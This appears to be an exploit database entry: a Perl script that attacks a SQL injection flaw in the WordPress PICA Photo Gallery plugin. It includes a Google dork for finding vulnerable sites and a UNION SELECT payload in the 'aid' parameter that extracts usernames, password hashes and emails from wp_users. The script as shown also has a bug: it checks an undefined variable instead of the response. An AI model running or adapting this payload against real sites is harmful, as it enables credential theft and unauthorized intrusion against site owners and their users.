# Author: D35m0nd142
# Software Link: http://www.apptha.co...A-Photo-Gallery
# Google Dork: intext:"Powered by Apptha." inurl:gallery
# Thanks to Da0ne
#!/usr/bin/perl use LWP::UserAgent; system("clear"); print "***********************************************\n"; print "* WordPress - PICA Photo Gallery SQLi exploit *\n"; print "* Created by D35m0nd142 *\n"; print "***********************************************\n\n"; print "Enter the target --> "; chomp(my $target=<STDIN>); $table_name="wp_users"; $agent = LWP::UserAgent->new() or die "Error!\n"; $agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'); $host = $target . "/pica-gallery/?aid=-1+union+select+concat(user_login,0x3a,user_pass,0x3a,user_email),2,3,4+from+wp_users-"; $request = $agent->request(HTTP::Request->new(GET=>$host)); $result = $request->content; if ($ok1 =~/([0-9a-fA-F]{32})/){ print "[+] Password found --> $1\n\n"; sleep 1; } else { print "No password found :(\n"; }